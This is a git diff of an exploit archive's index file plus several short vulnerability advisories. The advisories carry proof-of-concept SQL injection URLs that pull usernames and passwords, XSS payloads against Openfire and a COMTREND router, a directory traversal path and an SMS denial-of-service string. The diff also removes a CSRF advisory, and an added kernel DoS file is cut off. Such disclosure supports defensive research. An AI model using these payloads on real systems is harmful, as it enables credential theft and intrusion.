diff --git a/files.csv b/files.csv index f93aff1e7..1d559656f 100755 --- a/files.csv +++ b/files.csv @@ -29420,7 +29420,6 @@ id,file,description,date,author,platform,type,port 32656,platforms/php/webapps/32656.txt,"Octeth Oempro 3.5.5 Multiple SQL Injection Vulnerabilities",2008-12-01,"security curmudgeon",php,webapps,0 32657,platforms/windows/remote/32657.py,"Nokia N70 and N73 Malformed OBEX Name Header Remote Denial of Service Vulnerability",2008-12-12,NCNIPC,windows,remote,0 32658,platforms/asp/webapps/32658.txt,"ASP-DEV XM Events Diary 'cat' Parameter SQL Injection Vulnerability",2008-12-13,Pouya_Server,asp,webapps,0 -32659,platforms/hardware/webapps/32659.txt,"ICOMM 610 Wireless Modem - CSRF Vulnerability",2014-04-02,"Blessen Thomas",hardware,webapps,0 32660,platforms/asp/webapps/32660.txt,"CIS Manager CMS - SQL Injection",2014-04-02,"felipe andrian",asp,webapps,0 32661,platforms/windows/remote/32661.html,"Evans FTP 'EvansFTP.ocx' ActiveX Control Multiple Remote Buffer Overflow Vulnerabilities",2008-12-14,Bl@ckbe@rD,windows,remote,0 32662,platforms/php/webapps/32662.py,"WebPhotoPro Multiple SQL Injection Vulnerabilities",2008-12-14,baltazar,php,webapps,0 @@ -29436,3 +29435,25 @@ id,file,description,date,author,platform,type,port 32673,platforms/multiple/remote/32673.java,"GNU Classpath 0.97.2 'gnu.java.security.util.PRNG' Class Entropy Weakness (1)",2008-12-05,"Jack Lloyd",multiple,remote,0 32674,platforms/multiple/remote/32674.cpp,"GNU Classpath 0.97.2 'gnu.java.security.util.PRNG' Class Entropy Weakness (2)",2008-12-05,"Jack Lloyd",multiple,remote,0 32675,platforms/linux/dos/32675.py,"QEMU 0.9 and KVM 36/79 VNC Server Remote Denial of Service Vulnerability",2008-12-22,"Alfredo Ortega",linux,dos,0 +32676,platforms/php/webapps/32676.txt,"PECL Alternative PHP Cache Local 3 HTML Injection Vulnerability",2008-12-19,"Moritz Naumann",php,webapps,0 +32677,platforms/jsp/webapps/32677.txt,"Openfire <= 3.6.2 'group-summary.jsp' Cross-Site Scripting Vulnerability",2009-01-08,"Federico Muttis",jsp,webapps,0 +32678,platforms/jsp/webapps/32678.txt,"Openfire <= 3.6.2 'user-properties.jsp' Cross-Site Scripting Vulnerability",2009-01-08,"Federico Muttis",jsp,webapps,0 +32679,platforms/jsp/webapps/32679.txt,"Openfire <= 3.6.2 'log.jsp' Cross-Site Scripting Vulnerability",2009-01-08,"Federico Muttis",jsp,webapps,0 +32680,platforms/jsp/webapps/32680.txt,"Openfire 3.6.2 'log.jsp' Directory Traversal Vulnerability",2009-01-08,"Federico Muttis",jsp,webapps,0 +32681,platforms/hardware/remote/32681.txt,"COMTREND CT-536 and HG-536 Routers Multiple Remote Vulnerabilities",2008-12-22,"Daniel Fernandez Bleda",hardware,remote,0 +32682,platforms/linux/dos/32682.c,"Linux Kernel 2.6.x 'qdisc_run()' Local Denial of Service Vulnerability",2008-12-23,"Herbert Xu",linux,dos,0 +32683,platforms/asp/webapps/32683.txt,"Mavi Emlak 'newDetail.asp' SQL Injection Vulnerability",2008-12-29,"Sina Yazdanmehr",asp,webapps,0 +32684,platforms/windows/remote/32684.c,"Microsoft Windows Media Player 9/10/11 WAV File Parsing Code Execution Vulnerability",2008-12-29,anonymous,windows,remote,0 +32685,platforms/php/webapps/32685.txt,"ViArt Shop 3.5 manuals_search.php manuals_search Parameter XSS",2008-12-29,"Xia Shing Zee",php,webapps,0 +32686,platforms/multiple/remote/32686.xml,"MagpieRSS 0.72 CDATA HTML Injection Vulnerability",2008-12-29,system_meltdown,multiple,remote,0 +32687,platforms/asp/webapps/32687.txt,"Madrese-Portal 'haber.asp' SQL Injection Vulnerability",2008-12-29,"Sina Yazdanmehr",asp,webapps,0 +32688,platforms/windows/remote/32688.py,"Winace 2.2 Malformed Filename Remote Denial of Service Vulnerability",2008-12-29,cN4phux,windows,remote,0 +32689,platforms/php/webapps/32689.txt,"NPDS Versions Prior to 08.06 Multiple Input Validation Vulnerabilities",2008-12-04,"Jean-François Leclerc",php,webapps,0 +32690,platforms/linux/remote/32690.txt,"xterm DECRQSS Remote Command Execution Vulnerability",2008-12-29,"Paul Szabo",linux,remote,0 +32692,platforms/hardware/dos/32692.txt,"Symbian S60 Malformed SMS/MMS Remote Denial Of Service Vulnerability",2008-12-30,"Tobias Engel",hardware,dos,0 +32693,platforms/php/local/32693.php,"suPHP <= 0.7 'suPHP_ConfigPath' Safe Mode Restriction-Bypass Vulnerability",2008-12-31,Mr.SaFa7,php,local,0 +32694,platforms/osx/dos/32694.pl,"Apple Safari 3.2 WebKit 'alink' Property Memory Leak Remote Denial of Service Vulnerability (1)",2009-01-01,"Jeremy Brown",osx,dos,0 +32695,platforms/osx/dos/32695.php,"Apple Safari 3.2 WebKit 'alink' Property Memory Leak Remote Denial of Service Vulnerability (2)",2009-01-01,Pr0T3cT10n,osx,dos,0 +32696,platforms/linux/dos/32696.txt,"KDE Konqueror 4.1 Multiple Cross-Site Scripting and Denial of Service Vulnerabilities",2009-01-02,athos,linux,dos,0 +32697,platforms/linux/dos/32697.pl,"aMSN '.ctt' File Remote Denial of Service Vulnerability",2009-01-03,Hakxer,linux,dos,0 +32698,platforms/php/webapps/32698.txt,"SolucionXpressPro 'main.php' SQL Injection Vulnerability",2009-01-05,Ehsan_Hp200,php,webapps,0 diff --git a/platforms/asp/webapps/32683.txt b/platforms/asp/webapps/32683.txt new file mode 100755 index 000000000..d723d363f --- /dev/null +++ b/platforms/asp/webapps/32683.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/33041/info + +Mavi Emlak is prone to an SQL-injection vulnerability because it fails to properly sanitize user-supplied input. + +Attackers may exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +http://www.example.com/newDetail.asp?haberNo=-9999%20union%20select%200,username,password,3,4,5%20from%20Danismanlar \ No newline at end of file diff --git a/platforms/asp/webapps/32687.txt b/platforms/asp/webapps/32687.txt new file mode 100755 index 000000000..26258cdca --- /dev/null +++ b/platforms/asp/webapps/32687.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/33045/info + +Madrese-Portal is prone to an SQL-injection vulnerability because it fails to properly sanitize user-supplied input. + +Attackers may exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +http://www.example.com/[path]/haber.asp?haber=-999'%20union%20select%200,1,ad,3,4%20from%20Kullanici%20where%20'1 + +http://www.example.com/[path]/haber.asp?haber=-999'%20union%20select%200,1,sifre,3,4%20from%20Kullanici%20where%20'1 \ No newline at end of file diff --git a/platforms/hardware/dos/32692.txt b/platforms/hardware/dos/32692.txt new file mode 100755 index 000000000..5b7010445 --- /dev/null +++ b/platforms/hardware/dos/32692.txt @@ -0,0 +1,12 @@ +source: http://www.securityfocus.com/bid/33072/info + +Symbian S60 is prone to a denial-of-service vulnerability. + +Attackers can exploit this issue to prevent users from sending or receiving SMS or MMS messages. + +This issue affects handsets using Symbian S60. + +The following example message is available: + +"123456789@123456789.1234567890123 " + diff --git a/platforms/hardware/remote/32681.txt b/platforms/hardware/remote/32681.txt new file mode 100755 index 000000000..aaefb59b5 --- /dev/null +++ b/platforms/hardware/remote/32681.txt @@ -0,0 +1,17 @@ +source: http://www.securityfocus.com/bid/32975/info + +COMTREND CT-536 and HG-536 are prone to multiple remote vulnerabilities: + +- Multiple unauthorized-access vulnerabilities +- An information-disclosure vulnerability +- Multiple cross-site scripting vulnerabilities +- A denial-of-service vulnerability +- Multiple buffer-overflow vulnerabilities + +Attackers can exploit these issues to compromise the affected device, obtain sensitive information, execute arbitrary script code, steal cookie-based authentication credentials, and cause a denial-of-service condition. Other attacks are also possible. + +The following firmware versions are vulnerable; additional versions may also be affected: +CT-536 A101-302JAZ-C01_R05 +HG-536+ A101-302JAZ-C01_R05 and A101-302JAZ-C03_R14.A2pB021g.d15h + +http://www.example.com/scvrtsrv.cmd?action=add&srvName=%3Cscript%3Ealert(%22XSS%22)%3C/script%3E&srvAddr=192.168.1.1&proto=1,&eStart=1,&eEnd=1,&iStart=1,&iEnd http://www,example.com/password.html \ No newline at end of file diff --git a/platforms/hardware/webapps/32659.txt b/platforms/hardware/webapps/32659.txt deleted file mode 100755 index 389c171ef..000000000 --- a/platforms/hardware/webapps/32659.txt +++ /dev/null @@ -1,53 +0,0 @@ -Exploit Title : ICOMM 610 Wireless Modem CSRF Vulnerability - -Google dork : N/A - -Date : 02/04/2014 - -Exploit Author : Blessen Thomas - -Vendor Homepage : http://www.icommtele.com/ - -Software Link : N/A - -Version : ICOMM 610 - -Tested on : Device software version 01.01.08.991 (10/01/2010) - -Type of Application : Modem Web Application - -CVE : N/A - -Cross Site Request Forgery - -It was observed that this modem's Web Application , suffers from Cross-site - -request forgery through which attacker can manipulate user data via sending -him malicious craft url. - - -At attacker could change the password of the victim's account without the -victim's knowledge as the - -application is not having a security token implemented. - - -The Modem's application is not using any security token to prevent it -against CSRF. You can manipulate any userdata. PoC and Exploit to change -user password: In the POC the IP address in the POST is the modems IP -address. - - - - - -
- - - - diff --git a/platforms/jsp/webapps/32677.txt b/platforms/jsp/webapps/32677.txt new file mode 100755 index 000000000..ff38057a7 --- /dev/null +++ b/platforms/jsp/webapps/32677.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/32937/info + +Openfire is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input data. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. + +Openfire 3.6.2 is vulnerable; prior versions may also be affected. + +http://www.example.com/group-summary.jsp?search=%22%3E%3C[xss] \ No newline at end of file diff --git a/platforms/jsp/webapps/32678.txt b/platforms/jsp/webapps/32678.txt new file mode 100755 index 000000000..c99c4f345 --- /dev/null +++ b/platforms/jsp/webapps/32678.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/32938/info + +Openfire is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input data. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. + +Openfire 3.6.2 is vulnerable; prior versions may also be affected. + +http://www.example.com/user-properties.jsp?username=%3C[xss] \ No newline at end of file diff --git a/platforms/jsp/webapps/32679.txt b/platforms/jsp/webapps/32679.txt new file mode 100755 index 000000000..b44e43a6d --- /dev/null +++ b/platforms/jsp/webapps/32679.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/32940/info + +Openfire is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input data. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. + +Openfire 3.6.2 is vulnerable; prior versions may also be affected. + +http://www.example.com/log.jsp?log=%3Cimg%20src=%27%27%20onerror=%27[xss] \ No newline at end of file diff --git a/platforms/jsp/webapps/32680.txt b/platforms/jsp/webapps/32680.txt new file mode 100755 index 000000000..c01219c1e --- /dev/null +++ b/platforms/jsp/webapps/32680.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/32945/info + +Openfire is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input data. + +Exploiting the issue may allow an attacker to obtain sensitive information that could aid in further attacks. + +Openfire 3.6.2 is vulnerable; prior versions may also be affected. + +http://www.example.com/log.jsp?log=..\..\..\windows\debug\netsetup \ No newline at end of file diff --git a/platforms/linux/dos/32682.c b/platforms/linux/dos/32682.c new file mode 100755 index 000000000..94942e200 --- /dev/null +++ b/platforms/linux/dos/32682.c @@ -0,0 +1,64 @@ +source: http://www.securityfocus.com/bid/32985/info + +The Linux kernel is prone to a local denial-of-service vulnerability. + +Local attackers can exploit this issue to cause a soft lockup, denying service to legitimate users. + +Versions prior to Linux kernel 2.6.25 are vulnerable. + +#include